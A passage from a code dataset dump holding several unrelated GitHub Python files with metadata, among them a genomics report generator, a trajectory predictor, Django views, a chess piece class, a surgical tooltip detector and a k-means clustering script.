{starting_vcf_number} VCF files in this run<br>\", file=htmlfile)\n    if subset_boolen:\n        print(f\"\\n<h2>Subset ran, {keep_count:,} VCF files used in analysis.</h2>\", file=htmlfile)\n    print(f\"{remove_from_analysis_count} VCF files in this run were removed from analysis<br>\", file=htmlfile)\n    print(f\"{fixed_vcf_number_removed} VCF files in this run were corrupt and therefore removed<br>\", file=htmlfile)\n\n    #OPTIONS\n    samples_count_listed_groups = len(samples_groups_dict)\n    if all_vcf_boolen:\n        print(f\"\\n<h2>Groupings with {samples_count_listed_groups:,} listed:</h2>\", file=htmlfile)\n    print(\"<table>\", file=htmlfile)\n    print(\"<tr><th>Sample Name</th></tr>\", file=htmlfile)\n\n    for key, value in samples_groups_dict.items():\n        print(\"<tr>\", file=htmlfile)\n        print(f\"<td>{key}</td>\", end='\\t', file=htmlfile)\n        for group in value:\n            print(f\"<td>{group}</td>\", end='\\t', file=htmlfile)\n        print(\"</tr>\", file=htmlfile)\n    print(\"</table>\", file=htmlfile)\n\n    # REPORT DIFFERENCES BETWEEN STARTING FILES AND ENDING FILES REPRESENTED IN ALIGNMENTS AND TABLES\n    # if start_end_file_diff_count < 1:\n    #     print(\"\\n<h2>No files dropped from the analysis. Input files are equal to those represented in output.</h2>\", file=htmlfile)\n    # else:\n    #     print(\"\\n<h2>{} files have been dropped. They either need a group, mixed and not finding a group or an error occurred.</h2>\", file=htmlfile)\n    #     for i in difference_start_end_file:\n    #         print(\"{}<br>\" .format(i), file=htmlfile)\n    #     print(\"<br>\", file=htmlfile)\n    # print(\" \", file=htmlfile)\n    #Capture program versions for step 2\n    try:\n        print(\"\\n<h2>Program versions:</h2>\", file=htmlfile)\n        versions = os.popen('conda list biopython | grep -v \"^#\"; \\\n            conda list numpy | egrep -v \"^#|numpydoc\"; \\\n            conda list pandas | grep -v \"^#\"; \\\n            conda list pysam | grep -v \"^#\"; \\\n            conda list pyvcf | grep -v \"^#\"; \\\n            conda list raxml | grep -v \"^#\"').read()\n        versions = versions.split('\\n')\n        for i in versions:\n            print(\"%s<br>\" % i, file=htmlfile)\n    except:\n        # logging.debug(\"Unable to capture versions\")\n        pass\n    # print(\"Dependent source: {}<br>\" .format(arg_options['script_dependents']), file=htmlfile)\n\n    #FILES NOT RENAMED\n    # if names_not_changed is None:\n    #     print(\"\\n<h2>File names did not get changed:</h2>\", file=htmlfile)\n    #     for i in sorted(names_not_changed):\n    #         print(\"%s<br>\" % i, file=htmlfile)\n\n    print(\"\\n\", file=htmlfile)\n    htmlfile.close()","repo_name":"USDA-VS/vSNP","sub_path":"bin/vsnp_html_step2_summary.py","file_name":"vsnp_html_step2_summary.py","file_ext":"py","file_size_in_byte":6232,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"3"}
+{"seq_id":"72011402962","text":"import numpy as np\nimport ast\nfrom scipy.interpolate import interp1d\nfrom utils.dataset_types import MotionState\nfrom model.carTrackTransformerEncoder import CarTrackTransformerEncoder\nimport torch\nfrom collections import OrderedDict\nfrom model_inference import inference\nfrom tqdm import tqdm\n\n\ndef process(ego_id, init_frame_id, ego_path_dict_file='utils_folder/ego_path_dict.npy', traffic_dict_file='utils_folder/track_dict.npy', predicting_frames=50):\n # 读取主车路径文件: ego_path_dict_file\n ego_path_dict = np.load(ego_path_dict_file, allow_pickle=True)\n ego_path_dict = str(ego_path_dict)\n ego_path_dict = ast.literal_eval(ego_path_dict)\n ego_path_dict = dict(ego_path_dict)\n\n # 读取交通车信息文件: traffic_dict_file\n traffic_dict = np.load(traffic_dict_file, allow_pickle=True)\n traffic_dict = str(traffic_dict)\n traffic_dict = ast.literal_eval(traffic_dict)\n traffic_dict = dict(traffic_dict)\n\n # 创建 model\n d_model = 16\n nhead = 4\n num_layers = 1\n model_path = 'model_ckpt/epoch_999.pth'\n model = CarTrackTransformerEncoder(num_layers=num_layers, nhead=nhead, d_model=d_model)\n weights = torch.load(model_path, map_location='cpu')\n delete_module_weight = OrderedDict()\n for k, v in weights.items():\n delete_module_weight[k[7:]] = weights[k]\n model.load_state_dict(delete_module_weight, strict=True)\n model.eval()\n\n # 获得主车初始状态\n init_ego_x, init_ego_y, init_ego_yaw, init_ego_vx, init_ego_vy, init_S = get_inital_state(ego_id, init_frame_id, ego_path_dict) \n # init_ve = get_ve(init_ego_vx, init_ego_vy, init_ego_yaw)\n init_ve = init_ego_vx * np.cos(init_ego_yaw) + init_ego_vy * np.sin(init_ego_yaw)\n\n # 获得初始历史轨迹\n init_ego_history_path = initial_ego_history(init_ego_x, init_ego_y, init_ego_yaw)\n cur_ego_history_path = init_ego_history_path\n\n # 循环初始状态\n cur_frame_id = init_frame_id\n cur_S, cur_ego_x, cur_ego_y = init_S, init_ego_x, init_ego_y\n cur_vx, cur_vy = init_ego_vx, init_ego_vy\n cur_yaw = init_ego_yaw\n cur_ve = init_ve\n \n # 循环50次(5秒)\n prediction_track_dict = {}\n # while len(prediction_track_dict) < 50:\n for i in tqdm(range(predicting_frames)):\n # for i in range(32):\n # 获得交https://pics1.baidu.com/feed/3ac79f3df8dcd100d90a9c6985f05f1db8122f68.jpeg@f_auto?token=75e0258603c7fd0fb8e581290c192e69通车信息\n \n if f'{ego_id}-{cur_frame_id}' not in traffic_dict:\n print(f'there is no {ego_id}-{cur_frame_id}.')\n break\n \n traffic_info = traffic_dict[f'{ego_id}-{cur_frame_id}']\n \n # 获得主车未来轨迹\n ego_future_path = get_future_path(ego_id, ego_path_dict, cur_S)\n # print(len(ego_future_path))\n \n # 获得主车预测加速度\n # ego_info = (cur_ego_x, cur_ego_y, cur_vx, cur_vy, cur_yaw)\n # acc = inference(model, ego_info=ego_info, traffic_info=traffic_info, ego_future_path=ego_future_path)\n ego_info = (cur_ego_x, cur_ego_y, cur_vx, cur_vy, cur_yaw)\n \n acc = inference(model, ego_info=ego_info, traffic_info=traffic_info, ego_future_path=ego_future_path, ego_history_path=cur_ego_history_path)\n \n # 根据预测得到下一步路径\n next_S, next_ve = get_s_ve(cur_S, cur_ve, acc)\n\n try:\n # 根据下一步路径得到下一步路径的状态\n next_ego_x, next_ego_y, next_vx, next_vy, next_yaw = get_state(ego_id, next_S, old_x=cur_ego_x, old_y=cur_ego_y, ego_path_dict=ego_path_dict)\n except Exception as e:\n break\n \n # next_ve = get_ve(next_vx, next_vy, next_yaw)\n next_ego_history_path = update_ego_history(next_ego_x, next_ego_y, next_yaw, cur_ego_history_path)\n \n cur_frame_id += 1\n cur_S = next_S\n cur_ve = next_ve\n cur_ego_x, cur_ego_y = next_ego_x, next_ego_y\n cur_vx, cur_vy = next_vx, next_vy\n 
cur_yaw = next_yaw\n        cur_ego_history_path = next_ego_history_path\n        \n        new_motion_state = MotionState(time_stamp_ms=cur_frame_id*1000)\n        new_motion_state.x = cur_ego_x\n        new_motion_state.y = cur_ego_y\n        new_motion_state.vx = cur_vx\n        new_motion_state.vy = cur_vy\n        new_motion_state.psi_rad = cur_yaw\n        prediction_track_dict[cur_frame_id*100] = new_motion_state\n    \n    return prediction_track_dict\n    \n    \ndef get_state(ego_id, S, old_x, old_y, ego_path_dict):\n    Ts = 0.1\n    ego_path = ego_path_dict[str(ego_id)]\n    \n    x = [point[1] for point in ego_path]\n    y = [point[2] for point in ego_path]\n    yaw = [point[3] for point in ego_path]\n    distances = [point[-1] for point in ego_path]\n\n    # Build interpolation functions\n    f_x = interp1d(distances, x, kind='linear')\n    f_y = interp1d(distances, y, kind='linear')\n    f_yaw = interp1d(distances, yaw, kind='linear')\n\n    # Define the new arc-length value\n    new_distances = S\n\n    # Use the interpolators to get the corresponding x, y values and heading angle\n    new_x = f_x(new_distances)\n    new_y = f_y(new_distances)\n    new_yaw = f_yaw(new_distances)\n    new_vx = (new_x - old_x) / Ts\n    new_vy = (new_y - old_y) / Ts\n    return new_x, new_y, new_vx, new_vy, new_yaw\n\n\ndef get_s_ve(S0, Ve, acc):\n    # S0 is the vehicle's current arc length, Ve its current speed, acc its current acceleration\n    Ts = 0.1  # time step\n    S = S0 + Ve * Ts + 1/2 * acc * Ts * Ts\n    new_Ve = Ve + acc * Ts\n    \n    return S, new_Ve\n\n    \n# def get_ve(vx, vy, ego_yaw):\n#     return vx * np.cos(ego_yaw) + vy * np.sin(ego_yaw)\n    \n    \ndef get_inital_state(ego_id, frame_id, ego_path_dict):\n    # Get the initial state from the ego id and frame_id\n    ego_path = ego_path_dict[str(ego_id)] \n    \n    for i, frame in enumerate(ego_path):\n        if frame[0] == frame_id:\n            ego_x, ego_y, ego_yaw, ego_vx, ego_vy, S = frame[1:]\n            break\n    \n    return ego_x, ego_y, ego_yaw, ego_vx, ego_vy, S\n\n\ndef get_future_path(ego_id, ego_path_dict, S):\n    ego_path = ego_path_dict[str(ego_id)]\n\n    x = [point[1] for point in ego_path]\n    y = [point[2] for point in ego_path]\n    yaw = [point[3] for point in ego_path]\n    distances = [point[-1] for point in ego_path]\n\n    # Build interpolation functions\n    f_x = interp1d(distances, x, kind='linear')\n    f_y = interp1d(distances, y, kind='linear')\n    f_yaw = interp1d(distances, yaw, kind='linear')\n\n    # Define the new arc-length values (equal spacing)\n    new_distances = np.arange(S, distances[-1], 0.5)  # step size of 0.5 here; adjust as needed\n\n    # Use the interpolators to get the corresponding x, y values and heading angle\n    new_x = f_x(new_distances)\n    new_y = f_y(new_distances)\n    new_headings = f_yaw(new_distances)\n    new_ego_future_path = list(zip(new_x, new_y, new_headings))\n\n    return new_ego_future_path\n\n\ndef initial_ego_history(x, y, yaw):\n    oldest_point = (x, y, yaw)\n    ego_history_path = [oldest_point] * 10\n    return ego_history_path\n\n\ndef update_ego_history(x, y, yaw, ego_history_path):\n    ego_history_path.pop(0)\n    ego_history_path.append((x, y, yaw))\n    return ego_history_path\n","repo_name":"Heath-zyl/interaction_dataset_titl","sub_path":"python/main_calulate_prediction.py","file_name":"main_calulate_prediction.py","file_ext":"py","file_size_in_byte":7169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
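The kinematic step in get_s_ve above is the standard constant-acceleration update S = S0 + Ve*Ts + acc*Ts^2/2; a quick worked check with made-up numbers (Ts is fixed to 0.1 s in the code):

    # S0 = 10 m, Ve = 5 m/s, acc = 2 m/s^2
    # S      = 10 + 5*0.1 + 0.5*2*0.1**2 = 10.51 m
    # new_Ve = 5 + 2*0.1                 = 5.2 m/s
    S, new_Ve = get_s_ve(10.0, 5.0, 2.0)
    assert abs(S - 10.51) < 1e-9 and abs(new_Ve - 5.2) < 1e-9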
+{"seq_id":"44118158109","text":"from django.db.models import Avg\nfrom django.http import Http404\nfrom django.shortcuts import render\n\nfrom book_outlet.models import Book\n\n\ndef index(request):\n books = Book.objects.all().order_by(\"title\")\n total_book_count = books.count()\n average_rating = books.aggregate(Avg(\"rating\"))\n return render(request, \"book_outlet/index.html\",\n {\n 'books': books,\n 'total_book_count': total_book_count,\n 'average_rating': average_rating\n })\n\n\ndef book_detail(request, slug):\n try:\n book = Book.objects.get(slug=slug)\n except:\n raise Http404()\n\n return render(request, \"book_outlet/book_detail.html\",\n {\n 'title': book.title,\n 'author': book.author,\n 'rating': book.rating,\n 'is_bestseller': book.is_bestselling\n })\n","repo_name":"umargarga/django-book-store","sub_path":"book_outlet/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"23700676133","text":"# Merge every PDF document on this folder\n\nfrom PyPDF2 import PdfFileMerger, PdfFileReader\nfrom os import listdir\nimport os\nfrom os import path\n\ninput_dir = f\"{path.join(path.dirname (path.abspath(__file__)), 'backup-pdf')}\"\nprint(input_dir)\nmerge_list = []\n\nfor x in listdir(input_dir):\n if not x.endswith('.pdf'):\n continue\n merge_list.append(PdfFileReader(open(path.join(input_dir, x), 'rb')))\n\nmerger = PdfFileMerger()\n\nfor pdf in merge_list:\n merger.append(pdf)\n\nmerger.write(path.join(input_dir, 'merded_pdf.pdf')) #your output directory\nmerger.close()","repo_name":"NKKFu/autoce-v2","sub_path":"mergepdf.py","file_name":"mergepdf.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"}
+{"seq_id":"34162858071","text":"# 재귀적 함수 호출\n\ndef factorial(x):\n if x == 1:\n return 1\n return x * factorial(x-1)\n\nprint(factorial(3)) # 6\nprint(factorial(4)) # 24\n\n\ndef hanoi(ndisks, startPeg=1, endPeg=3):\n if ndisks:\n hanoi(ndisks-1, startPeg, 6-startPeg-endPeg)\n print(startPeg, \"번 기둥의\", ndisks, \"번 원반을\", endPeg, \"번 기둥에 옮깁니다.\")\n hanoi(ndisks-1, 6-startPeg-endPeg, endPeg)\n\nhanoi(ndisks=6)","repo_name":"kshelp/python","sub_path":"ch04_function/ex05_recursive.py","file_name":"ex05_recursive.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"25677912127","text":"from piece.base import SingleMovePiece\nfrom piece.rook import Rook\nfrom board.location import Location\nfrom util.enums import Side\nfrom board.move import Move\n\n\nclass King(SingleMovePiece):\n MOVE_VECTORS = [\n (-1, -1),\n (-1, 1),\n (1, -1),\n (1, 1),\n (-1, 0),\n (1, 0),\n (0, -1),\n (0, 1),\n ]\n\n def checked(self, location=None):\n \"\"\" Check if the king is in check\n\n :param location: Location or none (defaults to current location)\n :return: boolean\n \"\"\"\n location = self.location if location is None else location\n return location in self.board.attacked_locations(self.player.opponent())\n\n def can_castle(self, side):\n \"\"\" Determine if a king can castle to a certain side\n\n :param side: Side enum\n :return: boolean\n \"\"\"\n # king can't have moved\n if not self.moved:\n rook = self._get_unmoved_rook(side)\n if rook is not None:\n # check that no pieces are between the rook and king\n for loc in Location.from_between(rook.location, self.location):\n if not self.board.empty(loc):\n return False\n return True\n return False\n\n def _get_unmoved_rook(self, side):\n \"\"\" Try to get an unmoved rook based on the starting location\n\n :param side: Side enum\n :return: Rook or none if moved / captured\n \"\"\"\n if side == Side.KING:\n rook = self.board.piece(Location(self.location.row, Location.COLS[-1]), self.player)\n else:\n rook = self.board.piece(Location(self.location.row, Location.COLS[0]), self.player)\n if rook and isinstance(rook, Rook) and not rook.moved:\n return rook\n return None\n\n def moves(self):\n \"\"\" Get all possible moves by this piece (unvalidated moves)\n\n :return: Move generator\n \"\"\"\n yield from super().moves()\n\n if self.can_castle(Side.KING):\n rook = self._get_unmoved_rook(Side.KING)\n yield Move.create_castle(self, self.location.offset(0, 2), rook, rook.location.offset(0, -2))\n if self.can_castle(Side.QUEEN):\n rook = self._get_unmoved_rook(Side.QUEEN)\n yield Move.create_castle(self, self.location.offset(0, -2), rook, rook.location.offset(0, 3))","repo_name":"zackee12/command-line-chess","sub_path":"piece/king.py","file_name":"king.py","file_ext":"py","file_size_in_byte":2396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"26280485496","text":"\"\"\"\n@brief Detector of surgical tooltips in endoscopic images.\n@author Luis C. Garcia Peraza Herrera (luiscarlos.gph@gmail.com).\n@date 16 Jan 2021.\n\"\"\"\n\nimport skimage.morphology\nimport sknw\nimport numpy as np\nimport cv2\nimport sklearn.metrics\n\n# My imports\nimport endoseg\nimport endotip.graph\n\nclass Detector():\n \"\"\"\n @class Detector aims to localize the tooltips of the instruments present \n in endoscopic images.\n \"\"\"\n\n def __init__(self, max_inst=2, max_tips=2):\n \"\"\"\n @param[in] max_inst Maximum number of instruments in the image.\n @param[in] max_tips Maximum number of tips per instrument.\n \"\"\"\n self.max_inst = max_inst\n self.max_tips = max_tips\n self._graph = None\n self._im = None\n \n @staticmethod\n def skel(tool_seg):\n \"\"\"\n @brief Convert the tool segmentation into a pixel-wide skeleton.\n @returns a single-channel image with the pixels of the skeleton\n labelled as 255 and the background as zero.\n \"\"\"\n return skimage.morphology.skeletonize_3d(tool_seg.astype(bool))\n \n @staticmethod\n def skel2graph(skel):\n \"\"\"\n @brief Convert the pixel-wide skeleton into a networkx graph.\n @returns a ToolGraph representing the skeleton\n provided as input.\n \"\"\"\n return endotip.graph.ToolGraph().from_sknw(sknw.build_sknw(skel))\n\n @staticmethod\n def find_entry_pixels(ep_region_instance_seg, endo_seg, \n border_thickness=1):\n \"\"\"\n @brief This method receives the connected component segmentation of\n the entrypoints, which usually looks like a curved rectangle.\n The objective is then to reduce the curved rectangle into a\n single pixel that can be used as a tool entrypoint.\n @param[in] ep_region_instance_seg Instance segmentation of the \n border entrypoints.\n @param[in] endo_seg Segmentation of the visible\n endoscopic area.\n @returns a dictionary with all the entrypoint pixels found. The keys \n are integers and the values are [x, y] pairs.\n \"\"\" \n # Get a mask of the pixel-wide border\n #contours, hierarchy = cv2.findContours(endo_seg, cv2.RETR_TREE, \n # cv2.CHAIN_APPROX_SIMPLE)\n #border_seg = np.zeros_like(endo_seg)\n #cv2.drawContours(border_seg, contours, -1, 255, border_thickness)\n \n # Get the instance segmentation of the pixel-wide border \n #ep_region_instance_seg = ep_region_instance_seg.astype(np.uint8)\n #border_inst_seg = cv2.bitwise_and(border_seg, ep_region_instance_seg)\n \n # Get the 1-pixel entrypoint instance segmentation\n entry_pixels = {}\n num_ep = np.max(ep_region_instance_seg)\n for i in range(1, num_ep + 1):\n # Bruteforce geometric median\n #points = np.vstack(np.where(border_inst_seg == i)).T\n points = np.vstack(np.where(ep_region_instance_seg == i)).T\n dist = sklearn.metrics.pairwise_distances(points, points)\n geomedian = points[np.argmin(dist.sum(axis=1))] # [y, x]\n entry_pixels[i] = geomedian[::-1] # [x, y] \n\n return entry_pixels\n\n def extract_entry_nodes(self, endo_seg, tool_seg, graph, margin=32):\n \"\"\"\n @brief Detects the entrypoints and fuses them into a single\n entrypoint per instrument. All the entry nodes are marked with\n the attribute 'entry=True'. The rest of the nodes are marked\n with 'entry=False'.\n @param[in] endo_seg Endoscopic area segmentation. 
\n        @param[in] tool_seg        Binary (0, 255) tool segmentation.\n        @param[in, out] graph      ToolGraph representing \n                                   the skeleton of the tools.\n        \"\"\"\n\n        # Get the segmentation of the endoscopic border\n        kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,\n            (margin, margin))\n        smaller_endo_seg = cv2.erode(endo_seg, kernel, iterations=1) \n        border_seg = endo_seg - smaller_endo_seg\n        \n        # Get the segmentation of the entrypoints\n        entry_mask = cv2.bitwise_and(tool_seg, border_seg)\n\n        # Find connected components in the entrypoint segmentation\n        ret, ep_region_instance_seg = cv2.connectedComponents(entry_mask)\n\n        # Find entrypoint pixels based on the entrypoint segmentation\n        entry_pixels = Detector.find_entry_pixels(ep_region_instance_seg, \n            endo_seg)\n\n        # Group nodes in sets, those inside the same entry CC go together \n        entry_nodes = [set() for i in range(len(entry_pixels) + 1)]\n        for v in graph.nodes():\n            x, y = graph.coord(v)\n            entry_nodes[ep_region_instance_seg[y, x]].add(v)\n\n        # Collapse the entry nodes within the same entry region\n        for p in entry_pixels:\n            # Create new entry node\n            new_node = graph.add_coord_node(entry_pixels[p][0],\n                entry_pixels[p][1], entry=True)\n\n            # Collapse all the nodes within the entry region into the entry \n            # node\n            graph.contract_nodes(new_node, entry_nodes[p])\n\n        # TODO: Special case: all the nodes of the graph are within the \n        # entry connected component, needs to be treated differently\n\n    def detect(self, im, raw_tool_seg):\n        \"\"\"\n        @brief Localise the tooltips of the surgical instruments in the image.\n        @param[in] im           BGR image as a numpy.ndarray.\n        @param[in] raw_tool_seg 2D binary mask containing a semantic \n                                tool-background segmentation. \n        @returns a JSON containing the location of the tooltips in the image.\n        \"\"\"\n        # Segment the visible area of the endoscopic image\n        endo_segmenter = endoseg.Segmenter()\n        endo_seg = endo_segmenter.segment(im, erode_iterations=1)\n        \n        # We force the tool segmentation to be inside the visible area\n        tool_seg = cv2.bitwise_and(raw_tool_seg, endo_seg)\n\n        # Get a skeleton of the tools\n        skel = Detector.skel(tool_seg)\n\n        # Convert tool skeleton into a graph\n        graph = Detector.skel2graph(skel)\n        \n        # Instrument entry node extraction\n        self.extract_entry_nodes(endo_seg, tool_seg, graph)\n\n        # Remove nodes that are not connected to the extracted entry nodes\n        # and entry nodes that are not connected to anyone\n        graph.prune_disconnected_nodes()\n\n        # Dot product traversal edge labelling\n        graph.dot_product_traversal()\n\n        # Separate different tools into different graph components\n        graph.disentangle_tools()\n\n        # Only the furthest tips are kept\n        graph.keep_furthest_tips(self.max_tips)\n\n        # Only the instruments with the furthest tips are kept\n        graph.keep_longest_inst(self.max_inst)\n\n        # Store image and tool graph\n        self._graph = graph\n        self._im = im\n\n    def get_tips(self, padding=False):\n        \"\"\"\n        @param[in] padding If True, the list of tips is padded with Nones until we\n                           reach 'max_inst' * 'max_tips'.\n        @returns a dictionary with a list of leaf nodes in the following format:\n                 {'tips': [{'x': 1, 'y': 2}, {'x': 3, 'y': 4}]}. 
\n The tips are not in any particular order.\n \"\"\"\n tips = {'tips': [{'x': int(v[0]), 'y': int(v[1])}\n for v in self._graph.leaf_nodes(coord=True)]}\n \n # Fill the rest with None if the user wants\n if padding:\n remaining = (self.max_inst * self.max_tips) - len(tips['tips'])\n for _ in range(remaining):\n tips['tips'].append(None)\n \n return tips\n\n def get_entry_nodes(self, padding=False):\n \"\"\"\n @param[in] padding If True, the list of entry nodes will be filled with None\n values until we reach 'max_inst'.\n @returns a dictionary with a list of entrynodes in the following format: \n {'entrynodes': [{'x': 1, 'y': 2}, {'x': 3, 'y': 4}]}\n \"\"\"\n entrynodes = {'entrynodes': [{'x': int(v[0]), 'y': int(v[1])} \n for v in self._graph.entry_nodes(coord=True)]}\n \n # Fill the rest with None values if the user wants\n if padding:\n remaining = self.max_inst - len(entrynodes['entrynodes'])\n for _ in range(remaining):\n entrynodes['entrynodes'].append(None)\n\n return entrynodes\n \n def get_left_instrument_tips(self, padding=False):\n assert(self.max_inst == 2)\n left_tips = []\n \n # Get entry nodes and their coordinates in the image \n ep = {v: self._graph.coord(v) for v in self._graph.entry_nodes()}\n\n # If there are entry nodes, let's find if there is a left instrument\n left_entry_node = None\n if ep:\n keys = list(ep.keys())\n f_x = ep[keys[0]][0]\n\n # If there is only one instrument \n if len(ep) == 1:\n if f_x < self._im.shape[1] // 2:\n left_entry_node = keys[0] \n else:\n s_x = ep[keys[1]][0]\n if s_x > f_x:\n left_entry_node = keys[0]\n else:\n left_entry_node = keys[1]\n\n # Find the tips associated with the left instrument entry node\n leaf_nodes = self._graph.matched_leaf_nodes(left_entry_node)\n for v in leaf_nodes:\n coord = self._graph.coord(v)\n left_tips.append({'x': coord[0], 'y': coord[1]})\n\n if padding:\n remaining = self.max_tips - len(left_tips) \n for _ in range(remaining):\n left_tips.append({'x': None, 'y': None})\n \n return left_tips\n\n def get_right_instrument_tips(self, padding=False):\n assert(self.max_inst == 2)\n right_tips = []\n \n # Get entry nodes and their coordinates in the image \n ep = {v: self._graph.coord(v) for v in self._graph.entry_nodes()}\n\n # If there are entry nodes, let's find if there is a right instrument\n right_entry_node = None\n if ep:\n keys = list(ep.keys())\n f_x = ep[keys[0]][0]\n\n # If there is only one instrument \n if len(ep) == 1:\n if f_x >= self._im.shape[1] // 2:\n right_entry_node = keys[0] \n else:\n s_x = ep[keys[1]][0]\n if s_x <= f_x:\n right_entry_node = keys[0]\n else:\n right_entry_node = keys[1]\n\n # Find the tips associated with the right instrument entry node\n leaf_nodes = self._graph.matched_leaf_nodes(right_entry_node)\n for v in leaf_nodes:\n coord = self._graph.coord(v)\n right_tips.append({'x': coord[0], 'y': coord[1]})\n\n if padding:\n remaining = self.max_tips - len(right_tips) \n for _ in range(remaining):\n right_tips.append({'x': None, 'y': None})\n \n return right_tips\n\n '''\n def plot(self, **kwargs):\n \"\"\"@returns the tool graph plotted on top of the input image.\"\"\"\n if self._graph is None:\n raise RuntimeError(\"\"\"[ERROR] You want to plot the results of the\n tool detector but you have not called the detect() method.\"\"\")\n #return self.graph.draw_onto_image(self.im, **kwargs)\n return self._graph.draw_onto_canvas()\n 
'''\n","repo_name":"luiscarlosgph/endotip","sub_path":"src/endotip.py","file_name":"endotip.py","file_ext":"py","file_size_in_byte":11788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
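The entrypoint reduction above relies on a brute-force geometric median (the point minimizing the summed pairwise distances); the same step in isolation, with toy pixel coordinates:

    import numpy as np
    import sklearn.metrics

    points = np.array([[0, 0], [0, 1], [0, 2], [5, 1]])  # toy [y, x] pixels
    dist = sklearn.metrics.pairwise_distances(points, points)
    geomedian = points[np.argmin(dist.sum(axis=1))]
    print(geomedian)  # [0 1] -- the central point wins despite the outlier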
+{"seq_id":"19148867865","text":"#Zadatak 1 (a)\na = 5.0\nb = 4.935\nprint(a-b)\n#Očekujemo rezultat 0.065, ali dobili smo 0.06500000000000039. \n#To se događa jer razliku brojeva a i b ne možemo zapisati u obliku potencije 1/2^n.\n#S obzirom na to, rezultat dobiven u Pythonu točan je do određene decimale nakon koje dolazi do odstupanja, tj. ovakav rezultat je aproksimacija. \n\n#Zadatak 1 (b)\na = 0.1\nb = 0.2\nc = 0.3\nd = 0.6\nif a+b+c == d:\n print(\"Jednako\")\nelse:\n print(\"Nije jednako\")\n\nprint(a+b+c)\n\n#Očekivali smo rezultat 0.6, ali dobili smo 0.6000000000000001.\n#Do odstupanja dolazi zbog istog razloga kao u zadatku pod a.\n\n","repo_name":"IrisButigan/PAF","sub_path":"Vjezbe/Vjezbe_3/zadatak1.py","file_name":"zadatak1.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"sr","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"17718922974","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\n\r\n\r\n'''\r\nObjectif de ce code : \r\nConstruire des groupes de pays présentant les mêmes caractéristiques (sur 2014)\r\nNous avons pris le parti ici de se focaliser sur des caractéristiques environnementale\r\n\r\n- Construction de la segmentation avec la méthode K-means \r\n- Interprétation des clusters identifiés\r\n'''\r\n\r\n################################\r\n# I - IMPORT DES DONNEES \r\n################################\r\n\r\ndata = pd.read_csv('C:\\\\etude_cas_mcougul\\\\data\\\\WDIData.csv', sep=',')\r\ncountry = pd.read_csv('C:\\\\etude_cas_mcougul\\\\data\\\\WDICountry.csv', sep=',')\r\nseries_1= pd.read_csv('C:\\\\etude_cas_mcougul\\\\data\\\\WDISeries.csv', sep=',')\r\n\r\n\r\n###################################\r\n# II - PREPARATION DES DONNEES \r\n###################################\r\n\r\n# On filtre les data sur les pays \r\n\r\ndata_pays=data[['Country Code','Country Name','Indicator Code','2014']]\r\n\r\nliste = ['ARB','CSS','CEB','EAR','EAS','EAP','TEA','EMU','ECS','ECA','TEC','EUU','FCS','HPC',\r\n'HIC','IBD','IBT','IDB','IDX','IDA','LTE','LCN','LDC','LAC','TLA',' UN classification','LMY','LIC',\r\n'LMC','MEA','MNA','TMN','MIC','NAC','INX','OED','OSS','PSS','PST','PRE','SST','SAS','TSA','SSF',\r\n'SSA','TSS','UMC','WLD']\r\n\r\nfor i in liste:\r\n data_pays=data_pays[data_pays['Country Code'] != i]\r\n \r\n\r\n# On garde uniquement les indicateurs qui nous intéresse pour la clusterisation\r\n# cf. les indicateurs identifiés précédemment\r\n\r\nlist_kpis = ['EN.ATM.CO2E.GF.ZS',\r\n'EN.CO2.ETOT.ZS',\r\n'EN.ATM.CO2E.SF.ZS',\r\n'EN.CO2.TRAN.ZS',\r\n'EG.USE.COMM.CL.ZS',\r\n'EN.CO2.BLDG.ZS',\r\n'EN.CO2.OTHX.ZS',\r\n'EN.ATM.CO2E.LF.ZS',\r\n'EG.USE.CRNW.ZS']\r\n\r\ndata_pays_clustering=data_pays[data_pays[\"Indicator Code\"]=='EN.ATM.CO2E.PC']\r\ndata_pays_clustering.drop(['Indicator Code'],axis=1,inplace=True)\r\ndata_pays_clustering.rename(columns={'2014':'EN.ATM.CO2E.PC'},inplace = True)\r\n\r\nfor i in list_kpis:\r\n ajout_kpi=data_pays[data_pays[\"Indicator Code\"]==i]\r\n ajout_kpi.drop(['Country Name'], axis=1, inplace = True)\r\n data_pays_clustering = pd.merge(data_pays_clustering,ajout_kpi,on=['Country Code'],how='inner')\r\n data_pays_clustering.drop(['Indicator Code'],axis=1,inplace=True)\r\n data_pays_clustering.rename(columns={'2014':i} ,inplace = True) \r\n\r\n\r\n# Suppression des valeurs manquantes\r\n\r\ndata_pays_clustering=data_pays_clustering.dropna(axis=0)\r\n\r\n# Table finale\r\n\r\nx = data_pays_clustering.drop([\"Country Name\",\"Country Code\"],axis=1)\r\n\r\n\r\n###################################\r\n# III - CLUSTERISATION\r\n###################################\r\n\r\n# 1 - On utilise la méthode elbow pour trouver le nombre optimal de clusters\r\n\r\nfrom sklearn.cluster import KMeans\r\nfrom sklearn import cluster\r\nwcss = []\r\nfor i in range(1, 11):\r\n kmeans = KMeans(n_clusters = i, init = 'k-means++', random_state = 0)\r\n kmeans.fit(x)\r\n wcss.append(kmeans.inertia_) #attribut inertia_ qui est en fait le calcul de wcss\r\nplt.plot(range(1, 11), wcss) #plot(abscisse, ordonnée) => range(1,11) pour avoir chaque nb entre 1 et 10\r\nplt.title('La méthode Elbow')\r\nplt.xlabel('Nombre de clusters')\r\nplt.ylabel('WCSS')\r\nplt.show()\r\n\r\n# 2 - K-means \r\nkmeans = cluster.KMeans(n_clusters=4,init = 'k-means++',random_state=0)\r\nkmeans.fit(x)\r\ny_kmeans = kmeans.predict(x)\r\n\r\n# index triés des groupes\r\nidk = 
